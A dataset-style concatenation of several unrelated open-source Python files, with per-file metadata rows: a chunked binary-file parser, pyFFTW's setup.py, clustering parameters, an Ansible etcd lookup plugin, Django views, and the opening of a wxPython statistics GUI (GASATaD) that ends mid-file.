mtxs.append(Matrix.load(mtx_fn))
joined_mtx = Matrix.concatenate(mtxs, axis=args.axis)
# Make sure directory exists
LMObject().ready_filename(args.out_fn)
joined_mtx.write(args.out_fn)
# .............................................................................
if __name__ == "__main__":
main()
| gpl-3.0 | 8,207,966,249,622,702,000 | 26.688889 | 79 | 0.553772 | false | 4.019355 | false | false | false |
zstewar1/ALOLoader | chunckedparse.py | 1 | 4403 | #!/usr/bin/env python3
import aloobj
import argparse
import collections
import json
import pprint
import struct
import sys
def load_format(file):
return {int(k): v for k,v in json.load(file).items()}
def parse_chunked(format, buf):
chunk_data = collections.defaultdict(list)
while buf:
chunk_id, size = unpack('<Ii', buf)
sub_chunks = size < 0
# Clear the sign bit (used to indicate if a chunk contains sub-chunks)
size &= 0x7fffffff
chunk_type = format.get(chunk_id)
if chunk_type:
if sub_chunks:
chunk_data[chunk_type['name']].append(parse_chunked(format, buf[:size]))
else:
chunk_data[chunk_type['name']].append(parse_chunk(
chunk_type, buf[:size], chunk_data))
del buf[:size]
return chunk_data
def unpack(format, buf):
"""Both unpack and delete. Convert single-element tuples to their element"""
result = struct.unpack_from(format, buf)
if len(result) == 1:
result = result[0]
del buf[:struct.calcsize(format)]
return result
def unpack_asciiz(buf):
l = buf.find(b'\x00')
if l < 0:
# should not happen (famous last words), but if it does, interpret the whole
# bytearray as a string and delete all of its contents (by setting the end
# character to past the end
l = len(buf)
result = buf[:l].decode(encoding='ascii')
del buf[:l+1]
return result
def parse_chunk(format, buf, parent):
result = {}
content = format['content']
for c in content:
name = c.get('name')
t = c['type']
if c.get('head'):
del buf[:2]
if name is None:
del buf[:struct.calcsize(t)]
continue
ct = c.get('count')
if isinstance(ct, dict):
# always take the first element of the given chunk type.
ct = parent[ct['chunk_name']][0][ct['property']] * ct.get('scale', 1)
if ct is None:
if t == 'asciiz':
result[name] = unpack_asciiz(buf)
elif t == 'struct':
result[name] = parse_chunk(c, buf, parent)
else:
result[name] = unpack(t, buf)
elif ct == 'max':
result[name] = []
while buf:
if t == 'asciiz':
result[name].append(unpack_asciiz(buf))
elif t == 'struct':
result[name].append(parse_chunk(c, buf, parent))
else:
result[name].append(unpack(t, buf))
else:
result[name] = []
for _ in range(ct):
if t == 'asciiz':
result[name].append(unpack_asciiz(buff))
elif t == 'struct':
result[name].append(parse_chunk(c, buf, parent))
else:
result[name].append(unpack(t, buf))
return result
def main(args):
with args.json_file as json_file, args.chunked_file as chunked_file,\
args.output_file as output_file:
format = load_format(json_file)
buf = bytearray(chunked_file.read())
parse_result = parse_chunked(format, buf)
if args.output_format == 'dict':
print(parse_result, file=args.output_file)
elif args.output_format == 'json':
json.dump(parse_result, output_file)
print(file=args.output_file)
elif args.output_format == 'obj':
aloobj.dump(parse_result, output_file)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Load chunked files based on a json descripton')
parser.add_argument(
'json_file', type=argparse.FileType('r'),
help='The json file which describes the chunked format to be used')
parser.add_argument(
'chunked_file', type=argparse.FileType('rb'),
help='The chunked file to be read using the specified format')
parser.add_argument(
'--output-format', '-f', type=str, choices=('dict', 'json', 'obj'),
default='dict', help='The output format of the resulting data')
parser.add_argument(
'--output-file', '-o', type=argparse.FileType('w'), default=sys.stdout,
help='where to store the output of the operation (default: stdout)')
main(parser.parse_args())
| mit | 3,351,580,639,956,508,000 | 30.905797 | 88 | 0.559846 | false | 3.886143 | false | false | false |
fredRos/pyFFTW | setup.py | 1 | 6522 | # Copyright 2012 Knowledge Economy Developments Ltd
#
# Henry Gomersall
# [email protected]
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from distutils.core import setup, Command
from distutils.extension import Extension
from distutils.util import get_platform
from distutils.ccompiler import get_default_compiler
import os
import numpy
import sys
# Get the version string in rather a roundabout way.
# We can't import it directly as the module may not yet be
# built in pyfftw.
import imp
ver_file, ver_pathname, ver_description = imp.find_module(
'_version', ['pyfftw'])
try:
_version = imp.load_module('version', ver_file, ver_pathname,
ver_description)
finally:
ver_file.close()
version = _version.version
try:
from Cython.Distutils import build_ext as build_ext
sources = [os.path.join(os.getcwd(), 'pyfftw', 'pyfftw.pyx')]
except ImportError as e:
sources = [os.path.join(os.getcwd(), 'pyfftw', 'pyfftw.c')]
if not os.path.exists(sources[0]):
raise ImportError(str(e) + '. ' +
'Cython is required to build the initial .c file.')
# We can't cythonize, but that's ok as it's been done already.
from distutils.command.build_ext import build_ext
include_dirs = [os.path.join(os.getcwd(), 'include'),
os.path.join(os.getcwd(), 'pyfftw'),
numpy.get_include()]
library_dirs = []
package_data = {}
if get_platform() in ('win32', 'win-amd64'):
libraries = ['libfftw3-3', 'libfftw3f-3', 'libfftw3l-3']
include_dirs.append(os.path.join(os.getcwd(), 'include', 'win'))
library_dirs.append(os.path.join(os.getcwd(), 'pyfftw'))
package_data['pyfftw'] = [
'libfftw3-3.dll', 'libfftw3l-3.dll', 'libfftw3f-3.dll']
else:
libraries = ['fftw3', 'fftw3f', 'fftw3l', 'fftw3_threads',
'fftw3f_threads', 'fftw3l_threads']
class custom_build_ext(build_ext):
def finalize_options(self):
build_ext.finalize_options(self)
if self.compiler is None:
compiler = get_default_compiler()
else:
compiler = self.compiler
if compiler == 'msvc':
# Add msvc specific hacks
if (sys.version_info.major, sys.version_info.minor) < (3, 3):
# The check above is a nasty hack. We're using the python
# version as a proxy for the MSVC version. 2008 doesn't
# have stdint.h, so is needed. 2010 does.
#
# We need to add the path to msvc includes
include_dirs.append(os.path.join(os.getcwd(),
'include', 'msvc_2008'))
# We need to prepend lib to all the library names
_libraries = []
for each_lib in self.libraries:
_libraries.append('lib' + each_lib)
self.libraries = _libraries
ext_modules = [Extension('pyfftw.pyfftw',
sources=sources,
libraries=libraries,
library_dirs=library_dirs,
include_dirs=include_dirs)]
long_description = '''
pyFFTW is a pythonic wrapper around `FFTW <http://www.fftw.org/>`_, the
speedy FFT library. The ultimate aim is to present a unified interface for all
the possible transforms that FFTW can perform.
Both the complex DFT and the real DFT are supported, as well as arbitrary
axes of abitrary shaped and strided arrays, which makes it almost
feature equivalent to standard and real FFT functions of ``numpy.fft``
(indeed, it supports the ``clongdouble`` dtype which ``numpy.fft`` does not).
Operating FFTW in multithreaded mode is supported.
A comprehensive unittest suite can be found with the source on the github
repository.
To build for windows from source, download the fftw dlls for your system
and the header file from here (they're in a zip file):
http://www.fftw.org/install/windows.html and place them in the pyfftw
directory. The files are libfftw3-3.dll, libfftw3l-3.dll, libfftw3f-3.dll
and libfftw3.h.
Under linux, to build from source, the FFTW library must be installed already.
This should probably work for OSX, though I've not tried it.
Numpy is a dependency for both.
The documentation can be found
`here <http://hgomersall.github.com/pyFFTW/>`_, and the source
is on `github <https://github.com/hgomersall/pyFFTW>`_.
'''
class TestCommand(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
import sys, subprocess
errno = subprocess.call([sys.executable, '-m',
'unittest', 'discover'])
raise SystemExit(errno)
setup_args = {
'name': 'pyFFTW',
'version': version,
'author': 'Henry Gomersall',
'author_email': '[email protected]',
'description': 'A pythonic wrapper around FFTW, the FFT library, presenting a unified interface for all the supported transforms.',
'url': 'http://hgomersall.github.com/pyFFTW/',
'long_description': long_description,
'classifiers': [
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Development Status :: 4 - Beta',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Multimedia :: Sound/Audio :: Analysis',
],
'packages':['pyfftw', 'pyfftw.builders', 'pyfftw.interfaces'],
'ext_modules': ext_modules,
'include_dirs': include_dirs,
'package_data': package_data,
'cmdclass': {'test': TestCommand,
'build_ext': custom_build_ext},
}
if __name__ == '__main__':
setup(**setup_args)
| gpl-3.0 | 2,576,844,995,783,420,000 | 35.233333 | 139 | 0.650874 | false | 3.686829 | false | false | false |
mcandocia/RedditTreeGrab | genmod_params.py | 1 | 2399 | #this document contains the specific parameters for the generative model
#alter this prior to running code [genmod.py]
print "IMPORTING PARAMETERS"
useTerms = True
useSubs = True
name = 'apoptosis'
#this weights the terms more than the subreddits; this does nothing if subs is turned
#off
termMultiplier = 0.4#
#lambda terms are factors for the smoothing terms
#essentially, the higher they are, the greater the shrinkage
lambdaTerm = 2
lambdaSub = 1
#these are pre-defined groups
#replace this with None if unsupervised learning is used
clusterClasses = ['GG','SJW','O']
#these will make sure unlabeled classes are properly defined as so when
#reading in manually labeled data
nullClasses = ['NA','?']
#this is important for unsupervised learning
nclasses = 3
k=nclasses#just for quick reference
#if greater than 1, n-fold cross-validation is used to determine accuracy of algorithm
#with already-sorted data...this will make the algorithm run nfolds times longer
nfolds = 5
#defines number of iterations for convergence
niter = 9
#this defines the initial weight for labeled terms and subreddits
#true_weight = (2 + sample_size*weight*
#exp(-iter*decayRate)/training_size)/(2*sample_size)
#use decay = 0 to keep the terms fixed
#use weight = 0 to not use any weighting for labeled data
weightInitialTerm = 100
weightInitialSub = 100
decayTerm = 3.
decaySub = 3.
#sets lower bound for what the weight can decay to
weightMinTerm = 2.0/1
weightMinSub = 2.0/1
supervised_mode = False
#this can be used to define priors for clusters. If unchecked, then they will be
#calculated each loop
#it can also be adjusted to the initial value from the training set ("train")
clusterPriors = [0.05,0.01,0.94]
#this will smooth the priors slightly based on one's confidence in the training
#higher values are preferred
priorConfidence = 0.8
#use manually defined weights for each node
useManualWeights=False
#used for backwards parameter selection
paramSelection = True
paramIter = 2
paramFactor = 10
#used to pre-ignore certain variables manually; use this when results are counterintuitive for certain variables
ignoreSubs = []
ignoreTerms = []#[275,285,292]
#used for large subreddits that are frequent enough to warrant utilizing
forceSubs = []
forceTerms = []
#used to determine if fold results should be written
writefolds = True
| gpl-3.0 | 6,970,865,269,007,745,000 | 33.80597 | 112 | 0.756148 | false | 3.486919 | false | false | false |
bols-blue/ansible | lib/ansible/plugins/lookup/etcd.py | 56 | 2396 | # (c) 2013, Jan-Piet Mens <jpmens(at)gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
try:
import json
except ImportError:
import simplejson as json
from ansible.plugins.lookup import LookupBase
from ansible.module_utils.urls import open_url
# this can be made configurable, not should not use ansible.cfg
ANSIBLE_ETCD_URL = 'http://127.0.0.1:4001'
if os.getenv('ANSIBLE_ETCD_URL') is not None:
ANSIBLE_ETCD_URL = os.environ['ANSIBLE_ETCD_URL']
class Etcd:
def __init__(self, url=ANSIBLE_ETCD_URL, validate_certs=True):
self.url = url
self.baseurl = '%s/v1/keys' % (self.url)
self.validate_certs = validate_certs
def get(self, key):
url = "%s/%s" % (self.baseurl, key)
data = None
value = ""
try:
r = open_url(url, validate_certs=self.validate_certs)
data = r.read()
except:
return value
try:
# {"action":"get","key":"/name","value":"Jane Jolie","index":5}
item = json.loads(data)
if 'value' in item:
value = item['value']
if 'errorCode' in item:
value = "ENOENT"
except:
raise
pass
return value
class LookupModule(LookupBase):
def run(self, terms, variables, **kwargs):
if isinstance(terms, basestring):
terms = [ terms ]
validate_certs = kwargs.get('validate_certs', True)
etcd = Etcd(validate_certs=validate_certs)
ret = []
for term in terms:
key = term.split()[0]
value = etcd.get(key)
ret.append(value)
return ret
| gpl-3.0 | -1,095,950,408,388,433,000 | 28.580247 | 75 | 0.6202 | false | 3.767296 | false | false | false |
sophiataskova/helping_hands | helping_hands_site/helping_hands_app/views.py | 1 | 2696 | from django.shortcuts import render_to_response, render, get_object_or_404
from django.template import RequestContext, loader
from django.http import HttpResponse, HttpResponseRedirect
from django.http import Http404
from django.core.urlresolvers import reverse
from helping_hands_app.forms import *
from django.contrib.auth.decorators import login_required
from django.contrib.auth import logout
from django.views.decorators.csrf import csrf_protect
from helping_hands_app.models import Event, Choice
register = None
def index(request):
latest_event_list = Event.objects.all().order_by('-pub_date')[:5]
context = {'latest_event_list': latest_event_list}
return render(request, 'helping_hands_app/index.html', context)
def detail(request, event_id):
event = get_object_or_404(Event, pk=event_id)
return render(request, 'helping_hands_app/detail.html', {'event': event})
def results(request, event_id):
event = get_object_or_404(Event, pk=event_id)
return render(request, 'helping_hands_app/results.html', {'event': event})
def vote(request, event_id):
e = get_object_or_404(Event, pk=event_id)
try:
selected_choice = e.choice_set.get(pk=request.POST['choice'])
except (KeyError, Choice.DoesNotExist):
# Redisplay the event voting form.
return render(request, 'events/detail.html', {
'event': e,
'error_message': "You didn't select a choice.",
})
else:
selected_choice.votes += 1
selected_choice.save()
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('events:results', args=(e.id,)))
def register(request):
if request.method == 'POST':
form = RegistrationForm(request.POST)
if form.is_valid():
user = User.objects.create_user(
username=form.cleaned_data['username'],
password=form.cleaned_data['password1'],
email=form.cleaned_data['email']
)
return HttpResponseRedirect('/register/success/')
else:
form = RegistrationForm()
variables = RequestContext(request, {
'form': form
})
return render_to_response(
'registration/register.html',
variables,
)
def register_success(request):
return render_to_response(
'registration/success.html',
)
def logout_page(request):
logout(request)
return HttpResponseRedirect('/')
@login_required
def home(request):
return render_to_response(
'home.html',
{ 'user': request.user }
)
| mit | -7,993,477,616,929,553,000 | 31.878049 | 78 | 0.67322 | false | 3.895954 | false | false | false |
milegroup/gasatad | MainFrame.py | 1 | 81401 | """
This file is part of GASATaD.
GASATaD is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
GASATaD is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with GASATaD. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import sys
from sys import platform
import numpy
import wx
import wx.adv
import wx.grid
from pandas import to_numeric
from pandas.io.excel import read_excel
from pandas.io.parsers import read_csv
from AddColumnInterface import AddColumnInterface
from AskFileType import AskFileType
from BasicStatisticsInterface import BasicStatisticsInterface
from Controller import Controller
from GraphsInterface import HistogramInterface, ScatterPlotInterface, \
PieChartInterface, BoxPlotInterface, BarChartInterface
from Model import OptionsInExportInterface
from OpenFileInterface import OpenCSVFile, OpenXLSFile
from SignificanceTestInterface import SignificanceTestInterface
###########################################################################
## Class MainFrame
###########################################################################
class MainFrame(wx.Frame):
tagsAndValues = {}
histogramOptions = {}
scatterPlotOptions = {}
boxPlotOptions = {}
pieChartOptions = {}
barChartOptions = {}
def __init__(self, parent):
bmp = wx.Image(str(os.path.dirname(__file__)) + "/icons/SplashScreen2.0.png").ConvertToBitmap()
splash = wx.adv.SplashScreen(bmp, wx.adv.SPLASH_CENTRE_ON_SCREEN | wx.adv.SPLASH_TIMEOUT, 3000, None,
style=wx.STAY_ON_TOP | wx.FRAME_NO_TASKBAR) # msec. of splash
wx.Yield()
self.configInit()
# print "Invoked from directory:",self.params['options']['dirfrom']
wx.Frame.__init__(self, parent, id=wx.ID_ANY, title="GASATaD")
if platform != "darwin":
# image = wx.Image('GasatadLogo.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap()
# icon = wx.EmptyIcon()
# icon.CopyFromBitmap(image)
# self.SetIcon(icon)
# ib = wx.IconBundle()
# ib.AddIconFromFile("GasatadLogo.ico", wx.BITMAP_TYPE_ANY)
# self.SetIcons(ib)
icon = wx.Icon("GasatadLogo.ico", wx.BITMAP_TYPE_ICO)
self.SetIcon(icon)
self.CheckUpdates()
# self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )
# MENU BAR
self.m_menubar1 = wx.MenuBar(0)
# ------------ File menu
self.m_fileMenu = wx.Menu()
if sys.platform == "linux":
self.m_menuNewFile = wx.MenuItem(self.m_fileMenu, wx.ID_NEW, u"Open new file...", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_menuAddFile = wx.MenuItem(self.m_fileMenu, wx.ID_OPEN, u"Add file...", wx.EmptyString,
wx.ITEM_NORMAL)
else:
self.m_menuNewFile = wx.MenuItem(self.m_fileMenu, wx.ID_NEW, u"Open new file...\tCtrl+N", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_menuAddFile = wx.MenuItem(self.m_fileMenu, wx.ID_OPEN, u"Add file...\tCtrl+O", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_fileMenu.Append(self.m_menuNewFile)
self.m_fileMenu.Append(self.m_menuAddFile)
self.m_menuAddFile.Enable(False)
self.m_fileMenu.AppendSeparator()
if sys.platform == "linux":
self.m_menuExportData = wx.MenuItem(self.m_fileMenu, wx.ID_SAVE, u"Save data...", wx.EmptyString,
wx.ITEM_NORMAL)
else:
self.m_menuExportData = wx.MenuItem(self.m_fileMenu, wx.ID_SAVE, u"Save data...\tCtrl+S", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_fileMenu.Append(self.m_menuExportData)
self.m_menuExportData.Enable(False)
self.m_fileMenu.AppendSeparator()
if sys.platform == "linux":
self.m_menuResetData = wx.MenuItem(self.m_fileMenu, wx.ID_CLOSE, u"Close data", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_menuQuit = wx.MenuItem(self.m_fileMenu, wx.ID_EXIT, u"Quit", wx.EmptyString, wx.ITEM_NORMAL)
else:
self.m_menuResetData = wx.MenuItem(self.m_fileMenu, wx.ID_CLOSE, u"Close data\tCtrl+W", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_menuQuit = wx.MenuItem(self.m_fileMenu, wx.ID_EXIT, u"Quit\tCtrl+Q", wx.EmptyString, wx.ITEM_NORMAL)
self.m_fileMenu.Append(self.m_menuResetData)
self.m_menuResetData.Enable(False)
self.m_fileMenu.Append(self.m_menuQuit)
self.accel_tbl = wx.AcceleratorTable([
(wx.ACCEL_CTRL, ord('N'), self.m_menuNewFile.GetId()),
(wx.ACCEL_CTRL, ord('O'), self.m_menuAddFile.GetId()),
(wx.ACCEL_CTRL, ord('S'), self.m_menuExportData.GetId()),
(wx.ACCEL_CTRL, ord('W'), self.m_menuResetData.GetId()),
(wx.ACCEL_CTRL, ord('Q'), self.m_menuQuit.GetId())
])
# ------------ Edit menu
self.m_editMenu = wx.Menu()
self.m_undo = wx.MenuItem(self.m_fileMenu, wx.ID_UNDO, u"Undo", wx.EmptyString, wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_undo)
self.m_undo.Enable(False)
self.m_editMenu.AppendSeparator()
self.m_deletedSelectedCR = wx.MenuItem(self.m_fileMenu, wx.ID_ANY, u"Delete selected columns/rows",
wx.EmptyString, wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_deletedSelectedCR)
self.m_deletedSelectedCR.Enable(False)
self.m_editMenu.AppendSeparator()
self.m_renameSelectedCol = wx.MenuItem(self.m_fileMenu, wx.ID_ANY, u"Rename selected column", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_renameSelectedCol)
self.m_renameSelectedCol.Enable(False)
self.m_moveSelectedCol = wx.MenuItem(self.m_fileMenu, wx.ID_ANY, u"Move selected column", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_moveSelectedCol)
self.m_moveSelectedCol.Enable(False)
self.m_replaceInCol = wx.MenuItem(self.m_fileMenu, wx.ID_ANY, u"Replace in selected column...", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_replaceInCol)
self.m_replaceInCol.Enable(False)
self.m_sortSubMenu = wx.Menu()
self.m_sortAscending = self.m_sortSubMenu.Append(wx.ID_ANY, "ascending")
self.m_sortDescending = self.m_sortSubMenu.Append(wx.ID_ANY, "descending")
self.sortMenuID = wx.NewId()
self.m_editMenu.Append(self.sortMenuID, "Sort using selected column", self.m_sortSubMenu)
self.m_editMenu.Enable(self.sortMenuID, False)
self.m_discretizeSelectedCol = wx.MenuItem(self.m_fileMenu, wx.ID_ANY, u"Convert selected column to text",
wx.EmptyString, wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_discretizeSelectedCol)
self.m_discretizeSelectedCol.Enable(False)
self.m_numerizeSelectedCol = wx.MenuItem(self.m_fileMenu, wx.ID_ANY, u"Convert selected column to numbers",
wx.EmptyString, wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_numerizeSelectedCol)
self.m_numerizeSelectedCol.Enable(False)
self.m_editMenu.AppendSeparator()
self.m_addNewColumn = wx.MenuItem(self.m_fileMenu, wx.ID_ANY, u"Add text column...", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_addNewColumn)
self.m_addNewColumn.Enable(False)
self.m_deleteColumns = wx.MenuItem(self.m_fileMenu, wx.ID_ANY, u"Delete columns...", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_deleteColumns)
self.m_deleteColumns.Enable(False)
# ------------ About menu
self.m_aboutMenu = wx.Menu()
if platform != "darwin":
self.m_menuAbout = wx.MenuItem(self.m_aboutMenu, wx.ID_ABOUT, u"About GASATaD", wx.EmptyString,
wx.ITEM_NORMAL)
else:
self.m_menuAbout = wx.MenuItem(self.m_aboutMenu, wx.ID_ANY, u"About GASATaD", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_aboutMenu.Append(self.m_menuAbout)
self.m_menubar1.Append(self.m_fileMenu, u"File")
self.m_menubar1.Append(self.m_editMenu, u"Edit")
# self.m_menubar1.Append( self.m_optionsMenu, u"Options")
self.m_menubar1.Append(self.m_aboutMenu, u"About")
self.SetMenuBar(self.m_menubar1)
# self.m_menubar1.SetFocus()
globalSizer = wx.BoxSizer(wx.HORIZONTAL)
leftSizer = wx.BoxSizer(wx.VERTICAL)
# -------------------- Information part of the interface
informationSizer = wx.StaticBoxSizer(wx.StaticBox(self, wx.ID_ANY, u""), wx.VERTICAL)
self.m_staticText2 = wx.StaticText(informationSizer.GetStaticBox(), wx.ID_ANY, u"Data information",
wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText2.Wrap(-1)
self.m_staticText2.SetFont(
wx.Font(wx.NORMAL_FONT.GetPointSize(), wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD,
False, wx.EmptyString))
informationSizer.Add(self.m_staticText2, 0, wx.ALL, 5)
informationBoxSizer = wx.BoxSizer(wx.VERTICAL)
textInfo = u"Rows: 0 Columns: 0 Nulls: 0"
self.m_information = wx.StaticText(informationSizer.GetStaticBox(), wx.ID_ANY, textInfo, wx.DefaultPosition,
wx.DefaultSize, 0)
informationBoxSizer.Add(self.m_information, 0, wx.LEFT, 0)
informationSizer.Add(informationBoxSizer, 1, wx.RIGHT | wx.LEFT | wx.BOTTOM, 10)
leftSizer.Add(informationSizer, flag=wx.LEFT | wx.RIGHT | wx.BOTTOM | wx.EXPAND, border=10)
# -------------------- Buttons of the interface
buttonsSizer = wx.BoxSizer(wx.VERTICAL)
buttonsSubSizer1 = wx.GridSizer(rows=2, cols=2, vgap=0, hgap=0)
self.openNewFileBtn = wx.Button(self, wx.ID_ANY, u"Open new file", wx.DefaultPosition, wx.DefaultSize, 0)
buttonsSubSizer1.Add(self.openNewFileBtn, 0, wx.TOP | wx.BOTTOM | wx.LEFT | wx.EXPAND, 5)
self.addFileBtn = wx.Button(self, wx.ID_ANY, u"Add file", wx.DefaultPosition, wx.DefaultSize, 0)
buttonsSubSizer1.Add(self.addFileBtn, 0, wx.ALL | wx.EXPAND, 5)
self.addFileBtn.Enable(False)
self.exportDataBtn = wx.Button(self, wx.ID_ANY, u"Save data", wx.DefaultPosition, wx.DefaultSize, 0)
buttonsSubSizer1.Add(self.exportDataBtn, 0, wx.TOP | wx.BOTTOM | wx.LEFT | wx.EXPAND, 5)
self.exportDataBtn.Enable(False)
self.resetDataBtn = wx.Button(self, wx.ID_ANY, u"Close data", wx.DefaultPosition, wx.DefaultSize, 0)
buttonsSubSizer1.Add(self.resetDataBtn, 0, wx.ALL | wx.EXPAND, 5)
self.resetDataBtn.Enable(False)
buttonsSizer.Add(buttonsSubSizer1, 0, wx.EXPAND, 0)
buttonsSizer.AddSpacer(10)
self.descriptiveStatsBtn = wx.Button(self, wx.ID_ANY, u"Basic statistics", wx.DefaultPosition, wx.DefaultSize,
0)
self.descriptiveStatsBtn.Enable(False)
# self.descriptiveStatsBtn.SetMinSize( wx.Size( -1,25 ) )
buttonsSizer.Add(self.descriptiveStatsBtn, 0, wx.ALL | wx.EXPAND, 5)
self.significanceTestBtn = wx.Button(self, wx.ID_ANY, u"Significance tests", wx.DefaultPosition, wx.DefaultSize,
0)
self.significanceTestBtn.Enable(False)
# self.significanceTestBtn.SetMinSize( wx.Size( -1,25 ) )
buttonsSizer.Add(self.significanceTestBtn, 0, wx.ALL | wx.EXPAND, 5)
buttonsSizer.AddSpacer(10)
leftSizer.Add(buttonsSizer, flag=wx.ALL | wx.EXPAND, border=5)
# -------------------- Buttons for plot
gSizerChart = wx.GridSizer(0, 3, 0, 0)
# Images needed for the buttons
self.histogramBmp = wx.Image(str(os.path.dirname(__file__)) + "/icons/histogram1.png",
wx.BITMAP_TYPE_ANY).ConvertToBitmap()
self.scatterPlotmBmp = wx.Image(str(os.path.dirname(__file__)) + "/icons/scatterPlot1.png",
wx.BITMAP_TYPE_ANY).ConvertToBitmap()
self.pieChartmBmp = wx.Image(str(os.path.dirname(__file__)) + "/icons/pieChart1.png",
wx.BITMAP_TYPE_ANY).ConvertToBitmap()
self.boxPlotBmp = wx.Image(str(os.path.dirname(__file__)) + "/icons/boxPlot1.png",
wx.BITMAP_TYPE_ANY).ConvertToBitmap()
self.barChartBmp = wx.Image(str(os.path.dirname(__file__)) + "/icons/barChart1.png",
wx.BITMAP_TYPE_ANY).ConvertToBitmap()
self.histogramBtn = wx.BitmapButton(self, wx.ID_ANY, self.histogramBmp, wx.DefaultPosition, wx.Size(80, 80),
wx.BU_AUTODRAW)
gSizerChart.Add(self.histogramBtn, 0, wx.ALIGN_CENTER | wx.ALL, 5)
self.histogramBtn.Enable(False)
self.histogramBtn.SetToolTip(wx.ToolTip("Histogram"))
self.scatterPlotBtn = wx.BitmapButton(self, wx.ID_ANY, self.scatterPlotmBmp, wx.DefaultPosition,
wx.Size(80, 80), wx.BU_AUTODRAW)
gSizerChart.Add(self.scatterPlotBtn, 0, wx.ALIGN_CENTER | wx.ALL, 5)
self.scatterPlotBtn.Enable(False)
self.scatterPlotBtn.SetToolTip(wx.ToolTip("Scatter Plot"))
self.pieChartBtn = wx.BitmapButton(self, wx.ID_ANY, self.pieChartmBmp, wx.DefaultPosition, wx.Size(80, 80),
wx.BU_AUTODRAW)
gSizerChart.Add(self.pieChartBtn, 0, wx.ALIGN_CENTER | wx.ALL, 5)
self.pieChartBtn.Enable(False)
self.pieChartBtn.SetToolTip(wx.ToolTip("Pie Chart"))
self.boxPlotBtn = wx.BitmapButton(self, wx.ID_ANY, self.boxPlotBmp, wx.DefaultPosition, wx.Size(80, 80),
wx.BU_AUTODRAW)
gSizerChart.Add(self.boxPlotBtn, 0, wx.ALIGN_CENTER | wx.ALL, 5)
self.boxPlotBtn.Enable(False)
self.boxPlotBtn.SetToolTip(wx.ToolTip("Box Plot"))
self.barChartBtn = wx.BitmapButton(self, wx.ID_ANY, self.barChartBmp, wx.DefaultPosition, wx.Size(80, 80),
wx.BU_AUTODRAW)
gSizerChart.Add(self.barChartBtn, 0, wx.ALIGN_CENTER | wx.ALL, 5)
self.barChartBtn.Enable(False)
self.barChartBtn.SetToolTip(wx.ToolTip("Bar Chart"))
leftSizer.Add(gSizerChart, flag=wx.ALL | wx.EXPAND, border=5)
# ------------------- Info about upgrades
if self.params['upgradable']:
import wx.lib.agw.gradientbutton as GB
leftSizer.AddStretchSpacer(1)
# self.upgradeButton = wx.Button( self, wx.ID_ANY, u"* New version: "+self.params['availableVersionToUpgrade']+" *", wx.DefaultPosition, wx.DefaultSize, 0 )
self.upgradeButton = GB.GradientButton(self, label="New version available: " + (
self.params['availableVersionToUpgrade'].decode('utf-8')))
self.upgradeButton.SetBaseColours(startcolour=wx.TheColourDatabase.Find('PALE GREEN'),
foregroundcolour=wx.BLACK)
self.upgradeButton.SetPressedBottomColour(wx.TheColourDatabase.Find('LIGHT GREY'))
self.upgradeButton.SetPressedTopColour(wx.TheColourDatabase.Find('LIGHT GREY'))
boldFont = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
boldFont.SetWeight(wx.BOLD)
self.upgradeButton.SetFont(boldFont)
self.Bind(wx.EVT_BUTTON, self.openBrowserDownload, id=self.upgradeButton.GetId())
leftSizer.Add(self.upgradeButton, flag=wx.ALL | wx.EXPAND, border=5)
globalSizer.Add(leftSizer, flag=wx.EXPAND | wx.ALL, border=10)
# ------------------- Data table
self.m_dataTable = wx.grid.Grid(self)
